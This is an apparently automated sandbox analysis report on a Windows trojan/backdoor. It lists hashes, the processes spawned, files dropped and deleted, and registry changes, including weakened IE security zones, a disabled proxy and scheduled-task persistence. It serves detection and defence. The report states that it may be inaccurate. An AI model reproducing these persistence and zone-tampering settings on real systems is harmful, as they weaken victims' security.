Trojan.Generic.11523868_52feb8d0a4

by malwarelabrobot on November 29th, 2014 in Malware Descriptions.

Trojan.Win32.AntiFW.b (Kaspersky), Trojan.Generic.11523868 (AdAware), Backdoor.Win32.PcClient.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 52feb8d0a4447f79e3f56fe4a8a588f5
SHA1: 534fadf5bbc1ade55879079ff68b788e7969d99c
SHA256: 02867c9ed8b668d3dad76d15e05e70c0076047c4cc269828e8edda2b3eda062e
SSDeep: 6144:dr3bUzkuvcBYC47l2xiFjox21H9mbWnqnHB/Jc9BItkszgx4ygD6:drckuveY3fFj4ThVkszC4y/
Size: 322648 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2013-03-12 10:51:45
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1404
usetup.exe:220
SystemProlonger.exe:1612
SystemProlonger.exe:608
putfu.exe:1320
rundll32.exe:1676
rundll32.exe:512

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1404 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Custom.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.usetup.exe (25824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x86\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D} (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.putfu.exe (198289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsuA22E3355.dll (2569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\1_1[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.1_1.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\_Setup.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDF51210.dat (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\TsuDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.exe (15 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.dat (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\1[1].txt (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Custom.dll (3312 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.ico (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin1E16.bat (88 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.1.ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\DeltaFix[1].exe (198289 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.exe (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\52feb8d0a4447f79e3f56fe4a8a588f5.log (1657732 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x64\regsvr32.exe (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Readme.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\O167C5I7\agup[1].exe (25824 bytes)
%Documents and Settings%\All Users\Application Data\InstallMate\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\_Setup.dll (673 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x86 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x86\regsvr32.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D} (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsuA22E3355.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.putfu.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Custom.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_tin1E16.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.1.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\x64\regsvr32.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDF51210.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.ico (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.1_1.ini.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Addons\putfu.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Setup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Addons (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Addons\usetup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\r1.getapplicationmy[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\down.1404.usetup.exe.part (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\_Setup.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\r1.getapplicationmy[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Readme.txt (0 bytes)

The process usetup.exe:220 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\SnowApp\SystemProlonger\SystemProlonger.exe (26080 bytes)

The process SystemProlonger.exe:608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\SystemProlonger-S-4177913480.job (696 bytes)
%Documents and Settings%\All Users\Application Data\SnowApp\SystemProlonger\4177913480.ini (36544 bytes)

The process putfu.exe:1320 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\DeltaFix\DeltaFix.dll (260858 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (28502 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (0 bytes)

Registry activity

The process %original file name%.exe:1404 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\{3DA40CAB-BD44-40AF-A244-F566E6472E5D}\Addons]
"usetup.exe" = "usetup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"NetHood" = "%Documents and Settings%\%current user%\NetHood"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"TSAware" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"VersionMajor" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"UninstallString" = "C:\DOCUME~1\ALLUSE~1\APPLIC~1\INSTAL~1\{3DA40~1\Setup.exe /remove /q0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"Version" = "16777216"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\TsuA22E3355.dll,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"Language" = "1033"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"EstimatedSize" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Administrative Tools" = "%Documents and Settings%\All Users\Start Menu\Programs\Administrative Tools"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"VersionMinor" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c14c4f6-74da-11e2-81b0-000c29ec7fc5}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Administrative Tools" = ""
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"SendTo" = "%Documents and Settings%\%current user%\SendTo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"QuietUninstallString" = "C:\DOCUME~1\ALLUSE~1\APPLIC~1\INSTAL~1\{3DA40~1\Setup.exe /remove /q"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Fonts" = "%WinDir%\Fonts"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D 8B F4 FD C6 DA CC FC B0 90 BD D3 86 BF D7 06"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ecf8688d-6ba5-4c89-bc14-43df01af0cb9]
"TizPath" = "c:\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process usetup.exe:220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A3 BE 55 72 B8 E6 3A 58 FB D6 E0 29 BC B5 97 4C"

The process SystemProlonger.exe:1612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 2E 7A FE AD E7 61 34 74 AA 53 83 CA 92 C6 F8"

The process SystemProlonger.exe:608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 mGooxrikg01VravP7V/5b68FyY" = "NP6yu5 xztvqomjlha"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"_In" = "20141128"

[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 xGCT2oqomjlV2gRnCoLMWn7nyn" = "NP6yu5 tQ3dtOHwysu7dAPo9rWzs6Cz73val5GwlYqnEmAXyKRiEzz 0sbZtS5"
"NP6yu5 mGMVNpnikg0UES4we2P15TB9y" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 q2cpRx789/XueIe5iLgmR36Hi9ZR5HNZs2A" = "NP6yu5 p2g4ahLFHwykW"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"SilentUninstall" = "c:\documents and settings\all users\application data\snowapp\systemprolonger\systemprolonger.exe /uninstall"

[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 m493B1JLFHwfSLP0cq" = "NP6yu5 j4afWvjlhabCRFUrMY6XH7"
"NP6yu5 oxTCwROQIKEbfoQmXOVq3pyCV" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 u4W7I3FHwysfpPWVEc640Vgj7vuI5FRvR" = "NP6yu5 xKYF 812345Z1"
"NP6yu5 kzHwZuJLFHw5Fr3FSOzPpISE/F" = "NP6yu5 z9ki dG xztBeHgzzfrUcCBzYJjzlM03XUyvN fi5DF3ThnHiJv9dhJEjG0fde TGYXfWCSmQmAaRVh9liAcdEU6o/DVyNOh1C3bd5VePdl7fd6xWFTIhT 2cN4 d bwFINsRX0R xCm/Xpt1 vkNUu0U/ejw9Z 46dsSE3L4fJ1LZD40Qra3EozAj/KUo9Yzq5MSHIkeML56cNmIV8vxOEaBEBpOKYMddrQK1SLOS0KUOlCLMmEIHlHFaPWGWv2wliG7ANo1NjY QkVTF7TouhiLUTZhHYx7TgiD9brWoNZCoA6v8DS1aqrGLFUplKMqKHTLmAkWVsyY4KRXNwvdLz/5ISt/0xWN7bcshtc12I19DXygEyZCy9PLCX7XbFMzN8rUTPL8e875 XJZFrIfSi7ylqA4yI7B4Njur9ztySKHd/kShR4CAnEi2skAkgjDCnwShsABq5MBXA0SuGj3fTGQfiFaQOK7azBgXe9MO2nx3mtGro3weKv1tS"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"URLInfoAbout" = ""

[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 mPpwLQDWYSUoj8v7lBa0 8W0MSmWN4ClWM7" = "NP6yu5 pWfzXomjlhaY3L25EhciMYYPGZkywPx"
"NP6yu5 ow1rR56789/ue1sByvUf4kVuix" = "NP6yu5 p2g4ahLFHwykW"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"DisplayName" = "SystemProlonger"

[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 iI0lv89/XZTpmaWCAW6XiF/xIowoplYxrEc" = "NP6yu5 u bj81JLFHw0F5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"URLUpdateInfo" = ""

[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 jJE/mnBCDWYvA42sczUv9SClfrqvZXt8sBARO" = "NP6yu5 zln05FHwysu04U7VKD91PAojv"
"NP6yu5 t5w/eBhabcdLg7/sFSAaTxRvG" = "NP6yu5 pWfzXomjlhaY3L25EhciMYYPGZkywPx"
"NP6yu5 oFUvMDbcdefHBbxrMluGJ9Aygj" = "NP6yu5 yZKZjefABCDz76N9UmHe0p0kgH5NGRfwxzCZGcCt9/G/oGfA6jw"
"NP6yu5 t3BD56789/Xu4TF4qCfDCBTHm9BO81oA/UPCl" = "NP6yu5 jnxjzOdefABNqu"
"NP6yu5 jnTHsfABCDWtWkUM/W1aPBtS1 VQW3XAfac" = "NP6yu5 xztvqomjlha"
"NP6yu5 t p YmhabcdJfHSAepXR5o1j1c DKl8GWf2QPTqLd" = "NP6yu5 yGPmcIjlhabC8jyU1lyiDHIeZFTFR"
"NP6yu5 sFynDebcdef tMD" = "NP6yu5 zbMgbIcdefAUN"
"NP6yu5 oRN6utIKEG digPng1ySOBlAVHvZrTks5X3JZ0jUs" = "NP6yu5 o4IdosRJLFHmfwN6K"
"NP6yu5 rK2YdOCDWYSo sSZJb0LFNMK7umzJ4f" = "NP6yu5 o4IdosRJLFHmfwN6K"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"InstallDate" = "20131128"
"NoModify" = "1"

[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 upBrs456789yYTFdDrzVA0PJHl5GUN4cRRU6I0 /b" = "NP6yu5 ms6Kogvqomje5FgkwM"
"NP6yu5 kMSXeBMOQIKhE69m1QE674UDEx" = "NP6yu5 u bj81JLFHw0F5"
"NP6yu5 qCEj2JrpnikTXYRb/hjk8pv2i7" = "NP6yu5 ire7AFHwysu7daGH/1I 8/fYQTHvbDbfbFpsZR9hg1ZLTwQJfCgwjG"
"NP6yu5 qAAIJrpnikgVSUoLaz3mK8u RgKbxPY" = "NP6yu5 ms6Kogvqomje5FgkwM"
"NP6yu5 sH9 Y xztvq/XYWHIi jTIOMPd" = "NP6yu5 nWYONZWYSUMmKdWHSyBsxoIXlq8L0acxfPYSvuyukjdQWYOTbm8kHsQ"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"NoRepair" = "1"
"DisplayVersion" = "4.0.0.1919"

[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 uGnmtBCDWYSqb6jM/jZxaHmJs4bb/qRin 8" = "NP6yu5 uMM73jlhabcD2bm7fLUxHpHEXaGsTnu9xqsZV"
"NP6yu5 u2C5SlhabcdKYXGD2X5Dtp " = "NP6yu5 ph19whLFHwykp2y61l2FaT4r0bFW2swZ5vDQiK"
"NP6yu5 o/JAuurpnikZzc72iod641QVSkWTqJSu5zR" = "NP6yu5 rk50XvKEG xeKLvesJcI/uDaKRkMWR2hnutqmBtZdkaLX2fgHL"
"NP6yu5 jO7cksRJLFHdItgO4" = "NP6yu5 ookVA701234YHM8"
"NP6yu5 rOHR67habcdI6oQitBZylEDlKv" = "NP6yu5 ookVA701234YHM8"
"NP6yu5 q83XdcabcdeK18vAC0H9NVFErZY89qziqz" = "NP6yu5 pWfzXomjlhaY3L25EhciMYYPGZkywPx"
"NP6yu5 tJp3sbqomjlSvJfgkDPgofAaSAq8LeS0XEI" = "NP6yu5 v/8ZHGfABCDQWexMA"
"NP6yu5 s2TbxEefABCxJ0DAXr /fsJdEdZsSHr HV" = "NP6yu5 yJSqVjbcdefTNR8h0D9emAILDaou1CDRdu71j"
"NP6yu5 iqFGhLqomjlSrvHfNHJ3oZIgyJwy44WgZ8t" = "NP6yu5 z9ki dG xztBeHgzzfrUcCBzYJjzlM03XUyvN fi5DF3ThnHiJv9dhJEjG0fde TGYXfWCSmQmAaRVh9liAcdEU6o/DVyNOh1C3bd5VePdl7fd6xWFTIhT 2cN4 d bwFINsRX0R xCm/Xpt1 vkNUu0U/ejw9Z 46dsSE3L4fJ1LZD40Qra3EozAj/KUo9Yzq5MSHIkeML56cNmIV8vxOEaBEBpOKYMddrQK1SLOS0KUOlCLMmEIHlHFaPWGWv2wliG7ANo1NjY QkVTF7TouhiLUTZhHYx7TgiD9brWoNZCoA6v8DS1aqrGLFUplKMqKHTLmAkWVsyY4KRXNwvdLz/5ISt/0xWN7bcshtc12I19DXygEyZCy9PLCX7XbFMzN8rUTPL8e875 XJZFrIfSi7ylqA4yI7B4Njur9ztySKHd/kShR4CAnEi2skAkgjDCnwShsABq5MBXA0SuGj3fTGQfiFaQOK7azBgXe9MO2nx3mtGro3weKv1tS"
"NP6yu5 yEFhrM xztvBTqybYrHCKZLQDEDd77yDa71" = "NP6yu5 nWYONZWYSUMmKdWHSyBsxoIXlq8L0acxfPYSvuyukjdQWYOTbm8kHsQ"
"NP6yu5 xegqyZTVNPRhap40RL5nzk9RVF fIgeuX" = "NP6yu5 ouLGsR/XZTVHZg6"
"NP6yu5 jxu9x/ztvqoWwAvzzG1eDHhjPa" = "NP6yu5 pWfzXomjlhaY3L25EhciMYYPGZkywPx"
"NP6yu5 qwDMhUjlhabRi95gdx9wB Kt8h" = "NP6yu5 rk50XvKEG xeKLvesJcI/uDaKRkMWR2hnutqmBtZdkaLX2fgHL"
"NP6yu5 vGPjjAfABCDtsHMzvqSfT7E4si" = "NP6yu5 v/8ZHGfABCDQWexMA"
"NP6yu5 r 8G2h34567HEDrcOMl 7 u93c" = "NP6yu5 uMM73jlhabcD2bm7fLUxHpHEXaGsTnu9xqsZV"
"NP6yu5 jyYwQburpniZRRB5FiXXl0Nh4RV" = "NP6yu5 zln05FHwysu04U7VKD91PAojv"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"Publisher" = "SystemProlonger"

[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 vbNHYCDWYSUoiK7bPU/LiTlOXXB/Y/8ZsgUeDPvDrC" = "NP6yu5 ouLGsR/XZTVHZg6"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 41 0D 2A C4 20 56 D1 C4 1D 13 DE 55 7F CE 27"

[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 qmagWavqomjYke3rg3RaIWgtRR6ly542b" = "NP6yu5 ph19whLFHwykp2y61l2FaT4r0bFW2swZ5vDQiK"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"DisplayIcon" = "C:\Windows\System32\msiexec.exe"

[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
"NP6yu5 qnt FxztvqoDfBtS/GCPHJVoOIo2SDnPtKi" = "NP6yu5 yZKZjefABCDz76N9UmHe0p0kgH5NGRfwxzCZGcCt9/G/oGfA6jw"
"NP6yu5 obHhU6789/Xu3lMQKQBU9v0o8l1 pwHGQ7a" = "NP6yu5 ire7AFHwysu7daGH/1I 8/fYQTHvbDbfbFpsZR9hg1ZLTwQJfCgwjG"
"NP6yu5 t4SMY89/XZTo241UBcL1FgCdQgO" = "NP6yu5 jnxjzOdefABNqu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\S-4177913480]
"CategoryName" = "Apps"
"UninstallString" = "c:\documents and settings\all users\application data\snowapp\systemprolonger\systemprolonger.exe /uninstall"

[HKLM\SOFTWARE\SystemProlonger\4177913480\NP6yu5 tnZZH0OQIKE1/gD3hJMqT/]
